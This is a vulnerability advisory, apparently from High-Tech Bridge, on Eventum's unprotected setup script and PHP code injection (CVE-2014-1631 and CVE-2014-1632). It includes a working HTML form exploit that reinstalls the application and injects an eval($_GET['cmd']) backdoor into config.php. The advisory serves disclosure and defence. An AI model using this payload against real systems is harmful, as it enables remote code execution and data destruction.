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htbridgeHigh-Tech BridgeHTB23198
HistoryJan 22, 2014 - 12:00 a.m.

Multiple Vulnerabilities in Eventum

High-Tech Bridge

0.02 Low




High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.

  1. Incorrect Default Permissions in Eventum: CVE-2014-1631
    The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at β€œ/setup/index.php” is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.
    The installation script can be access by a remote unauthenticated user via the following URL:

  2. Code Injection in Eventum: CVE-2014-1632
    The vulnerability exists due to insufficient sanitization of the HTTP POST parameter β€œhostname” in β€œ/config/config.php” script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server.
    The following exploitation example injects a backdoor into β€œ/config/config.php” file:
    <form action=β€œhttp://[host]/setup/index.php” method=β€œpost” name=β€œmain”>
    <input type=β€œhidden” name=β€œcat” value=β€œinstall”>
    <input type=β€œhidden” name=β€œhostname” value=β€œβ€˜); eval($_GET[β€˜cmd’]); $tmp=(’”>
    <input type=β€œhidden” name=β€œrelative” value=β€œ/”>
    <input type=β€œhidden” name=β€œdb_hostname” value=β€œdb_hostname”>
    <input type=β€œhidden” name=β€œdb_name” value=β€œdb_name”>
    <input type=β€œhidden” name=β€œdb_table_prefix” value=β€œdb_table_prefix”>
    <input type=β€œhidden” name=β€œdrop_tables” value=β€œyes”>
    <input type=β€œhidden” name=β€œdb_username” value=β€œdb_username”>
    <input type=β€œhidden” name=β€œsetup[smtp][from]” value="[email protected]">
    <input type=β€œhidden” name=β€œsetup[smtp][host]” value=β€œlocalhost”>
    <input type=β€œhidden” name=β€œsetup[smtp][port]” value=β€œ25”>
    <input type=β€œhidden” name=β€œβ€ value=β€œβ€>
    <input type=β€œsubmit” id=β€œbtn”>
    After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the β€œphpinfo()” PHP function on the vulnerable system:
